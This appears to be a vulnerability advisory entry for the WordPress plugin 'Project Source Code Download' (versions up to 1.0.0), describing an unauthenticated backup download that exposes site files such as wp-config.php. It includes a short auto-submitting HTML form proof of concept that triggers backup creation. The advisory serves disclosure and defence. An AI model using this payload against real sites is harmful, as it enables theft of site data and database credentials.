WordPress Plugin Vulnerabilities

Project Source Code Download <= 1.0.0 - Unauthenticated Backup Download

Description

The plugin does not protect its backup generation and download functionalities, which may allow any visitors on the site to download the entire site, including sensitive files like wp-config.php.

Proof of Concept

<form id="test" action="https://example.com/wp-admin/" method="POST">
    <input type="text" name="create" value="Project source code download">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

References

Classification

Type
FILE DOWNLOAD
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes

Timeline

Publicly Published
2022-07-11 (about 1 years ago)
Added
2022-07-11 (about 1 years ago)
Last Updated
2023-04-11 (about 1 years ago)

Other